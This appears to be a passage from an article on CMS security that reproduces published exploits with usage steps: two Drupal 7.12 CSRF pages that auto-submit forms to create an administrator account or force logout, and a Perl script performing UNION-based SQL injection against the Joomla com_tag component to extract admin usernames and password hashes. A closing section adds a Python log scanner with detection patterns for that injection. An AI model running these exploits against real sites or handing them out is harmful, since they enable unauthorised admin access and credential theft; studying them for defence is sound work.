As noted earlier, no CMS is perfect when it comes to security; there will almost certainly be one or two holes that can be breached. Below are some example vulnerabilities published on exploit-db.com.
1. Drupal CMS 7.12
- Exploit (Add Administrator)
```html
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit change user to admin</H2>
<form method="POST" name="form0" action="http://<IP_TARGET>/drupal/admin/people/create?render=overlay&render=overlay">
  <input type="hidden" name="name" value="new_admin"/>
  <input type="hidden" name="mail" value="ab@a.com"/>
  <input type="hidden" name="pass[pass1]" value="pass123"/>
  <input type="hidden" name="pass[pass2]" value="pass123"/>
  <input type="hidden" name="status" value="1"/>
  <input type="hidden" name="roles[3]" value="3"/>
  <input type="hidden" name="timezone" value="Asia/Jakarta"/>
  <input type="hidden" name="form_build_id" value="form-Aj18NNvRSPmhHJqC9KHYWlD5Fa4taVJbHoL2AmfmVcQ" />
  <input type="hidden" name="form_token" value="BXyA8uNbxtYnrsnuzoQehnsEOqNz4ojwNz8j26idueA"/>
  <input type="hidden" name="form_id" value="user_register_form"/>
  <input type="hidden" name="op" value="Create new account"/>
</form>
</body>
</html>
```
Implementation:
1. Save the code to the file “test add admin.html”.
[Figure: HTML code for adding an admin user]
2. Open the file in a browser.
[Figure: The code being loaded in the web browser]
3. The user is created in the database.
[Figure: Admin user successfully added]
- Exploit (Force Logout)
```html
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to logout Admin</H2>
<form method="POST" name="form0" action="http://<IP_TARGET>:80/drupal/user/logout">
</form>
</body>
</html>
```
Implementation:
1. Save the code to the file “force log out.html”.
2. Joomla tag Remote SQL Exploit
Author: Daniel Barragan "D4NB4R"
```perl
#!/usr/bin/perl -w
# Joomla Component (tag) Remote SQL Exploit
#--------------------------------------------------------------#
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_tag Remote Sql Exploit \n";
print "\t\n\n";
use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
#the username of joomla
$user="username";
#the password of joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="com_tag&task";
$component="tag&lang=es";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<user>(.*?)<user>/){
    print "\nLos Datos Extraidos son:\n";
    print "\n * Admin User : $1";
}
if ($answer =~/<pass>(.*?)<pass>/){
    print "\n * Admin Hash : $1\n\n";
    print "\t\t# El Exploit aporto usuario y password #\n\n";
}
else{
    print "\n[-] Exploit Failed, Intente manualmente...\n";
}
```
Implementation:
1. Save the file as tag.sh
2. Run the program/code above on a Linux operating system (execute it as a Perl application).
4. The password has been obtained, but it is still encrypted.
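A defensive counterpart to the com_tag request shown above, added here as an example and not part of the original post or of Joomla: it scans web-server access-log lines for requests to `option=com_tag` whose `tag` parameter carries SQL syntax after URL-decoding. The combined log format, the rule set, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target of a combined-format access-log line (assumed format).
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# SQL constructs that a tag name never needs; matched after URL-decoding.
RULES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "concat-call": re.compile(r"\bconcat\s*\(", re.I),
    "hex-literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
    "users-table": re.compile(r"\bfrom\s+\w+_users\b", re.I),
    "sql-comment": re.compile(r"--(\s|$)"),
}

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_tag&task=tag&lang=es&tag=rock%27n%27roll HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_tag&task=tag&lang=es&tag=999999.9%27%20union%20all%20select%201,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from%20jos_users--+a HTTP/1.1" 200 5300',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 900',
]

def rules_hit(value):
    """Names of the rules matched by one decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def scan(lines):
    """Return (client_ip, [rule names]) for com_tag requests with SQL in `tag`."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue  # not a parseable request line
        # parse_qs decodes %xx and '+' so the rules see what the application receives
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "com_tag" not in query.get("option", []):
            continue  # only the component discussed on this page
        hits = [h for value in query.get("tag", []) for h in rules_hit(value)]
        if hits:
            findings.append((m.group("ip"), hits))
    return findings

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ",".join(hits))
```

A lone apostrophe in a tag name is deliberately not a rule, so an ordinary tag such as the one in the first sample line is not flagged.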